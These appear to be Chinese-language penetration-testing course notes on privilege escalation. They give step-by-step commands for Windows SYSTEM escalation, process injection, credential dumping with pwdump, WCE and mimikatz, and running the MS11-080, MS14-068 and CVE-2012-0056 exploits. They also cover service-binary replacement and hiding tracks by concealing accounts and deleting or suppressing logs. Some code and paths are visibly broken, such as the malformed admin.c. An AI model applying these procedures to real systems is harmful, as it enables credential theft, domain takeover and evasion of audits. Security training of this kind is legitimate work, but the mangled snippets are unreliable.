安全牛-提权

auth.log


本地提权
已实现本地低权限账号登录
  远程溢出
  直接获得账号密码
希望获取更高权限
  实现对目标进一步控制

前提：
已经登录到目标系统的服务器上，但是得到的是一个低权限用户，进行提权，最终达到全面控制目标系统


系统账号之间权限隔离
  操作系统安全的基础
  用户空间
  内核空间
系统账号
  用户账号登陆时获取权限令牌
  服务账号无需用户登陆已在后台启动服务

了解：
操作系统多用户，没有单用户的。
多用户操作系统指的是一个系统里可以设置多个用户账号，可以是用户账号也可以是应用程序的账户(让某些应用程序以这个账户去执行应用程序)。

目的：
实现不同账户之间的权限分离，因为所有的事情给一个账号去做，那么就需要给这个账号最大的权限。账户密码一旦失窃，HACK获得之后，控制服务器。

安全建议：
不同的应用，不同的用户，不同的人，都创建各自独立的账号，赋予每个账号相应的权限，给于它完成本职工作足够的权限，除了本职工作之外的权限都不给于。

渗透：
当渗透的时候，拿到一个权限非常受限的账号密码，登录进去发现自己在这个系统中能做的事情很少，有可能只是对一个应用/一个服务可以有基本的控制和使用权，甚至控制权都没有只有使用权，即使拿到账号密码离最终的目的相距甚远。

用户空间：
可以由各个用户账户使用用户空间，在里面执行各种操作，编辑文档/安装软件/对系统进行定制化等等一些操作

内核空间：
工作在与用户空间完全独立的内核空间，内核空间里的所有操作是用户空间里的用户没有办法去接触到的，出于安全性考虑，不同的操作系统也为内核空间的操作，也划分了不同的账号，有的账号可以做一些低层的，核心的操作；也有一些被限制权限非常小，只能做很有限的一点点内核操作。

小结：
现在的操作系统，已经把不同的用户划分到各自非常独立的，非常有限的空间里面。

安全检查：
用户权限的赋予，做安全审计时候，非常非常重要的一个工作项目

用户账号：
最高权限账号创建用户，当用户登陆时获取唯一权限令牌，下一次登录是获取随机令牌。

服务账号：
即使用户账户不登录系统，这些服务用户已在后台启动服务

Windows
  user
  Administrator
  System
Linux
  User
  Root

默认用户：
user，Administrator，System(负责启动系统内核，真正的最大权限者)

用户提权：
user-->administrator-->system(他们的权限之间是有交集，不是完全包含，user被administrator包含)
当获得user提权为administrator
当获得administrator提权为system


ADMIN提权为SYSTEM
Windows system账号
  系统设置管理功能
   SysInternal Suite
      https://technet.microsoft.com/en-us/sysinternals/bb545027
      psexec -i -s -d taskmgr
   at 19:39 /interactive cmd
   sc Create syscmd binPath= "cmd /K start" type= own type= interact
   sc start syscmd


设置密码
net user 账户名字 *
查看当前账户情况(属于哪个组)
net user 账户名字
图形化查看
管理-->本地用户和组-->属性-->隶属于-->哪个组
思路
调用系统功能来提权，这些功能默认使用system去执行
提权--将administrator提权为system
1.at---只能在window xp /window 2003
at /?
at
at 19:39 /interactive cmd  交互
启动任务管理器（查看cmd的权限是否为system）
可以在该cmd窗口下，输入一些命令执行相关操作，举例：notepad
每个进程都单独启动比较繁琐，能否用system账号把administrator的explore杀死
taskmgr 打开，explore 杀死，桌面环境消失
任务管理器中，文件，创建新任务，输入explore ，桌面环境出现，点击开始，可以查看当前用户权限    
这时就不需要使用命令行去执行命令了。
当遇到有些操作需要administrator权限，注销就可以回到administrator
2.sc---win7/win8
创建系统命令
sc Create syscmd binPath= "cmd /K start" type= own type= interact  
查看创建的服务
services.msc
命令行启动
sc start syscmd
3.外置软件
(1)SysInternal Suite
找到whoami程序（不能使用就找网上找一个），放到window/system32/
命令行下使用 whoami(administrator)
sc start syscmd 打开一个新的窗口
whoami(system)
(2)在SysInternal Suite找到PsExec.exe 放到window/system32/
命令行下运行PsExec.exe-->agree
查看参数
-i 交互模式
-s 使用system账号
PsExec.exe -i -s


注入进程提权
隐蔽痕迹
  pinjector.exe
  http://www.tarasco.org/security/Process_Injector/ （工具找不到了。。。)

目的：
实现目的也是从管理员提升成system账户，也可从管理员提升为低权限账号，或者提升生成其他管理员账号。
总之，可以将自己提升成不同权限的账号

思路：
找一个system运行的服务进程，把自己注入到进程里面，注入到进程里就和进程有同样的用户权限，也就是system。

流程：
默认情况下，使用操作系统自带的程序是无法实现的，所以必须使用第三方程序(进程注入器)
下载http://www.tarasco.org/security/Process_Injector/
pinjector.exe放到window/system32/
pinjector.exe 运行命令
pinjector.exe -l 列出可注入的进程
pinjector.exe -p pid cmd 5555 注入到系统正常的服务里，侦听555端口（一定要注入services.exe，查看后面是否为system运行）
netstat -ano | find “5555” 查看端口
任务管理器-->查看-->选择列-->PID(服务名字与PID没有改变)
nc -nv ip 5555 （连接不上，原因防火墙开启）

查看进程，手动查杀进程
SysInternal Suite中有一个presxp文件
查看注入的服务中(详细信息，属性-TCP/UDP)，存在的问题。

好处,
不增加任何新的进程，隐蔽痕迹。
即获得system权限，又相当隐蔽的效果。

网上案例
https://www.cnblogs.com/NBeveryday/p/6239351.html  



抓包嗅探--获取目标密码
Windows
  Wireshark
  Omnipeek
  commview--xp
  Sniffpass--基于抓包收集密码
Linux
  Tcpdump
  Wireshark
  Dsniff--基于抓包收集密码

sniffpass-win
win开启sniffpass
kali下开启ftp
service pure-ftpd start
netstat -pantu | grep 21
win访问ftp
ftp://ip
观察sniffpass

Dsniff--kali
dsniff -h
dsniff -i eth0


键盘记录--获取目标密码
Keylogger
木马窃取

法国木马
DarkComet  


本地缓存密码
浏览器缓存的密码
  IE浏览器
  Firefox
网络密码    
无线密码
http://www.nirsoft.net(密码破解网站)
Dump SAM
  Pwdump(kali下面默认集成，该工具可以远程执行)
  /usr/share/windows-binaries/fgdump/


浏览器缓存
登陆一个网站，提示是否记住，这样是为了方便工作使用，因为这次登陆需要输入密码，那么下一次登陆还需要输入密码，这样用户体验差，浏览器为了人性化的考虑，提示保存密码，保存之后下一次登陆网站的时候，浏览器会自动将信息填入到相应的表单中。

思路
如果登陆控制了一台服务器，可以通过一些方法，把浏览器中保存的这些历史账号密码提取出来，从而发现用户登陆更多系统的账户密码

实战
Firefox:Edit--->perferences-->Security-->Eemeber password for sites--->Saved Passwords--->show passwords
IE浏览器:工具-->Internet-->内容-->自动完成“设置”--->管理密码
网络密码-->控制面板-->凭据管理器-->查看相应的凭据
Pwdump(从SAM中读取)-->放入xp系统-->命令行-->Pwdump.exe-->找到数据库window/system32/config/SAM (文本直接读取是打不开的)-->利用Pwdump读取SAM文件账户和密码--->Pwdump.exe localhost-->保存hash-->kali下利用ophcrack破解hash



WINDOWS身份认证过程







WCE(WINDOWS CREDENTIAL EDITOR)
kali目录下，/usr/share/wce/
需要管理员权限
wce-universal.exe -l / -lv
wce-universal.exe -d
wce-universal.exe -e / -r
wce-universal.exe -g
wce-universal.exe -w
LM/NT hash

原理
从内存中读取，必须是用户登录状态

实战
cd /usr/share/wce/
ls
ls -l
将wce-universal.exe拷贝到目标机
wce-universal.exe -l 显示当前已经登录状态的账号
wce-universal.exe -lv 显示当前已经登录账号的详细信息（登录账号不注销，切换查看）
wce-universal.exe -r 每隔5秒，刷新当前已经登录账号状态（登录账号不注销，切换查看）
wce-universal.exe -e 指定刷新时间，刷新当前已经登录账号状态（登录账号不注销，切换查看）
wce-universal.exe -d seesion值 删除
wce-universal.exe -g 计算的值    计算生成的hash值
wce-universal.exe -w 读取内存密码，查看创建的用户与密码
net user xxx 查看用户是否归属于管理员组

将a的会话改为b的会话(账号秘密更改)
wce-universal.exe -i a的luid -s b的账户信息
wce-universal.exe -lv


从内存读取LM / NTLM hash
Digest Authentication Package
NTLM Security Package
Kerberos Security Package
防止WCE攻击
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaSecurity Packages
  kerberos
  msv1_0
  schannel
  wdigest
  tspkg
  pku2u

思路
删除Digest Authentication Package，重启之后使用wce查看密码就看不到了

实战
regedit
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaSecurity Packages
删除wdigest，读取不到密码，系统自动关机，再次启动这时系统已经被注入，被破坏了。继续使用的话容易出现问题。。。



其他工具
pwdump localhost ---提取密码hash值
fgdump
mimikatz
  privilege::debug #提升权限
  sekurlsa::logonPasswords
  ::


fgdump
位置 /usr/share/windows-binaries/
拷贝到目标机器，双击”fgdump“，生成3个文件，查看文件内容
其他账户没有登录的情况下，fgdump依旧可以读取到其他用户密码

mimikatz（大神级别）
位置 /usr/share/mimikatz
ls (选择相应的版本32/64)
拷贝到目标机器
执行命令mimikatz.exe
::  查看参数
privilege::debug 提升权限
sekurlsa::logonPasswords 查看登录信息
process ::list 进程列表
process ::start calc 启动进程
process ::suspend xx 冻住某个进程
process ::resume xx 恢复某个进程
lsadump::sam  读取密码（win7/8可以执行）
lsadump::cache
lsadump::lsa
lsadump::hash
ts:: 终端服务，多用户登录交互
ts::multirdp 打补丁，可以多用户登录，互不干扰

查处操作系统日志
eventvwr
event::clear 清除系统安全性日志
event::drop 不产生新的日志，登录信息不会记录到日志，管理员进行审计会审计不到

misc::cmd 启动cmd
net localgroup
misc::regedit 启动注册表
misc::wifi 查看连接过的无线密码

tocken::
tocken::whoami 查看当前用户
tocken::list


利用漏洞提权（没有打补丁的情况下）
Ms11-080
Kb2592799
  https://technet.microsoft.com/library/security/ms11-080
Pyinstaller
  https://pypi.python.org/pypi/PyInstaller/2.1
python pyinstaller--onefile ms11-080.py
Pywin32
  http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
MS11-046
  DoS


利用低权限提权
Ms11-080---
表示11年发现的第80个漏洞。
Kb2592799
表示关于漏洞描述以及漏洞的解决办法。
MS11-046
可以实现DoS

实战（PC本地提权）
searchsploit ms11-080 搜索漏洞
cp /usr/share/exploitdb/platforms/windows/local/18176.py .  拷贝到当前目录
复制到目标机器，目标主机安装有p0ython
cd /Python27
python.exe 18176.py    -O XP
在中文版本xp系统上实现的是拒绝服务攻击，在英文版本上实现的是提权    
appwiz.cpl  检查补丁信息
卸载存在的Kb2592799
问题来了，不可能所有的目标机器都有安装python的机会，这时候怎么办？
在本机下编译为exe文件
问题又来了，如何编译？
第一，有python环境；
第二，组件Pyinstaller
第三，组件Pywin32
第四，先装pywin32，后解压Pyinstaller
第五，将解压后的Pyinstaller放到pyhon32中，后将18176.py放入Pyinstaller中
第六，cd --->cd python27PyInstaller-2.1--->dir--->../python.exe PyInstaller.py --onefile 18176.py
第七，将文件拷贝到目标机器的临时文件夹，确认目标机器是普通用户权限(net user xx)
第八，cd -->cd temp-->net user xx(查看当前用户是否为普通用户)---->18176.exe -O XP
第九，再次查看自己的权限，成功提权，所有管理员权限都可以做
net localgroup administration xx /add
接下来可以进行修改管理员权限



Ms14-068
库
  https://github.com/bidord/pykek
ms14-068.py -u user@lab.com -s userSID -d dc.lab.com
拷贝 TGT_user1@lab.com.ccache 到windows系统
本地管理员登陆
  mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit

思路
可通过ms11-080漏洞获得一台机器本地管理员的控制权，但是很多公司有域管理(微软定义安全边界)

前提
拥有本机的管理员权限。

利用
成功利用，可以获得域里面一台普通用户的管理员权限，可以是域里面的一名普通用户，只要具有本机的管理员权限，就可以获得域的管理员权限

搭建域控
47-1 -----(50-60)

实战(win7下可以，xp失败，将本地管理员提权为域控管理员权限)
searchsploit ms14-068 搜索
cp /usr/share/exploitdb/platforms/windows/remote/35474.py .  拷贝到当前目录
1.首先在kali下，生成票据文件
python 35474.py -u user@lab.com -s userSID -d dc.lab.com
-u 指定当前域账号用户，域给分配的最低权限的
-s 账号的SID (net user xx domain,,,,,利用脚本whoami查看)
-d 域名（计算机属性-->计算机名-->完整的计算机名称，解析不了域名，所以直接指定域管理地址IP）
提示输入密码，user@lab.com的密码，已经掌握的密码
2.然后将票据文件拷贝到windows系统去使用
使用本地管理员账号登陆，将票据文件与mimika放在同一个文件夹下
3.最后在windows下利用mimikatz完成票据的提升
cd
dir
kerberos::ptc TGT_user@lab.com.ccache
net use \w2k3.lab.comadmin$  访问域共享文件夹
klist 列举当前身份验证信息
运行-->\w2k3.lab.comc$
regedit 打开一个注册表，连接一个网络注册表
mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit
域下的普通用户是无法访问\w2k3.lab.comc$

在域控下，对比3种工具的
fgdump 只能查看本地的用户信息
wce 可以查看域里面的用户信息（当前当管理员登陆到你的机器上，这时候你们同时在线，可以使用wce查看当前登陆用户的信息，前提你是本机的管理员）
mimikatz(privilege::debug 提权---->kerberos::list---->sekurlas::logonPasswords )

库的问题
初次使用ms14-068.py -u user@lab.com -s userSID -d dc.lab.com脚本的时，会遇到一个报错提示，缺少一些库文件
下载软件包
https://github.com/mubix/pykek  



Ubuntu11.10
   http://old-releases.ubuntu.com/releases/11.10/
gcc
  sudo apt-cdrom add && sudo apt-get install gcc
  gcc 18411.c -o exp
CVE-2012-0056
  /proc/pid/mem
  kernels >=2.6.39
  http://blog.zx2c4.com/749


实战
搜索漏洞代码
searchsploit cve-2012-0056
searchsploit 18411.c
拷贝目标机器
cp /usr/share/exploitdb/platforms/linux/local/18411.c .    
目标机器安装gcc
sudo apt-cdrom add && sudo apt-get install gcc    
修改为exp
gcc 18411.c -o exp
给exp权限
chmod +x exp
查看当前权限
w
运行
./exp
命令查看
id

遇到的问题
安装不上gcc

解决办法
加载iso光盘
将光盘挂载到目录mnt或者media/cdrom    
ls /mnt/
ls /media/
mount /dev/cdrom /media/cdrom
查看挂载情况
ls  /media/cdrom
将cd作为更新源
apt-cdrom add
安装gcc    
apt-get install gcc


利用配置不当提权


与漏洞提权相比 更常用的方法
  企业环境
  补丁更新的全部已经安装
  输入变量过滤之外更值得研发关注的安全隐患
  以system权限启动
    NTFS权限允许users修改删除

思路
在一些企业用户安全意识比较好的，有补丁安装更新的策略，不容易发现企业中有一台很老的漏洞供hack去利用，在安全制度比较健全，比较完善的企业里比较难发现这样的漏洞，去完成提权。
在企业环境下，想进行提权，有的情况下就无法利用漏洞了，那么就可以采用其他的一些方法....
利用管理员对服务器权限的分配不当完成权限的提升，操作系统的服务都是默认以system权限运行的，开发人员的意思不够强，没有在代码里进行相应的参数过滤等等安全机制的增加，在操作系统中启动就是以system权限运行的，渗透进入一台主机的话，如果找不到漏洞提权，可以查看当前系统的操作系统权限，查看某些服务是不是以system权限执行，找到存在的系统服务，可以尝试替换启动服务的执行程序，如果执行程序可以替换掉，服务下次开机服务启动的时候，被替换为我们的反弹shell程序，程序被执行，就可以获得系统的执行权限(更加常见的情况)

条件
查看服务的权限（services.msc---是否为本地系统）
同时了解程序NTFS权限（启动的NTFS权限限制不严谨，允许普通用户去修改/删除/替换，就可以使用反弹shell程序替换）


icacls
   icacls c:windows*.exe /save perm /T
   i586-mingw32msvc-gcc -o admin.exe admin.c
Find
   find / -perm 777 -exec ls -l {} ;


如何快速发现配置不当的权限
icacls
icacls c:windows*.exe /save perm /T  保存为文本
打开文本perm，查找“FA:::BU”，

反弹shell代码--admin.c
#include<stdlib.h>
int mian()
i=system("net localgroup administrator a /add");
return 0;
}
编译
 i586-mingw32msvc-gcc -o admin.exe admin.c
查看
file admin.exe
拷贝
cp xx xx

linux下查找
ls -l
find / -perm 777 -exec ls -l {} ;

应用系统的配置文件
  应用连接数据库的配置文件
  后台服务运行账号

思路：
比如渗透进入一个web应用系统，无论是哪种架构的程序，应用服务器与数据库之间都会有连接，基于这个特点控制一台应用服务器权限，可利用应用程序的配置文件，配置文件里面可能存在用户账号密码。

基本信息收集
Linux
   /etc/resolv.conf  dns配置
   /etc/passwd      用户账户
   /etc/shadow      用户密码
   whoami and who -a
   ifconfig -a, iptables -L -n, netstat –r  ip/防火墙设置/网关
   uname –a, ps aux  操作系统版本，进程
   dpkg -l | head 所有安装的软件包

实战
ls /etc/passwd -l
ls /etc/shadow -l

Windows
   ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r  所有的网络配置参数/dns缓存/查看路由    
   net view , net view /domain 查看网络共享的
   net user /domain, net user %username% /domain 查域账号
   net accounts, net share   查看当前机器开启的共享
   net localgroup administrators username /add 添加管理员组
   net group "Domain Controllers" /domain 域环境下，可以查看到Domain有哪些主机账户
   net share name$=C: /unlimited  开启C盘共享
   net user username /active:yes /domain  域环境下，在有域管理员权限下，发现锁定账号，启动账号

实战
ipconfig /displaydns 可以发现目标经常访问哪些重要的服务器


WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
   wmic nicconfig get ipaddress,macaddress 读取mac地址
   wmic computersystemget username 读取当前登录账户
   wmic netlogin get name,lastlogon 读取上次登录记录
   wmic process get caption, executablepath,commandline 读取使用进程
   wmic process where name=“calc.exe" call terminate 结束进程
   wmic os get name,servicepackmajorversion 提取操作系统版本
   wmic product get name,version 查看安装软件
   wmic product where name=“name” call uninstall /nointeractive 后台运行删除软件
   wmic share get /ALL 查看共享文件夹
   wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1“ 开启远程桌面
   wmic nteventlogget path,filename, writeable 查看当前系统日志

收集敏感数据
商业信息
系统信息
Linux
  /etc ；/usr/local/etc
  /etc/passwd ；/etc/shadow
  .ssh ；.gnupg 公私钥
  The e-mail and data files
 业务数据库 ；身份认证服务器数据库
  /tmp 临时目录

实战：
ls -la 查看.文件
cat .ssh/know_hosts 查看登录过的秘钥
cd .gnupg 公私钥


windows
   SAM 数据库 ； 注册表文件
   %SYSTEMROOT% epairSAM  修复的版本的sam
   %SYSTEMROOT%System32configRegBackSAM  备份的sam
  业务数据库 ； 身份认证数据库
  临时文件目录
   UserProfileAppDataLocalMicrosoftWindowsTemporary Internet Files

实战：
无


隐藏痕迹
禁止在登陆界面显示新建账号
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinLogonSpecialAccountsUserList" /v uname /T
REG_DWORD /D 0
del %WINDIR%*.log /a/s/q/f
History
日志
   auth.logauth.log / secure
   btmp / wtmp
   lastlog / faillog
其他日志和 HIDS 等

实战：
1.win
禁止在登陆界面显示新建账
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v 用户名 /T REG_DWORD /D 0
在net user中不显示
？？？？
删除日志
del %WINDIR%*.log /a/s/q/f
2.kali
ls -l .bash_history    
history -c
lsattr 查看文件属性，与权限相关的
chattr 更改权限
ls auth.log 日志文件
ls btmp 数据文件
ls lastlog 登录信息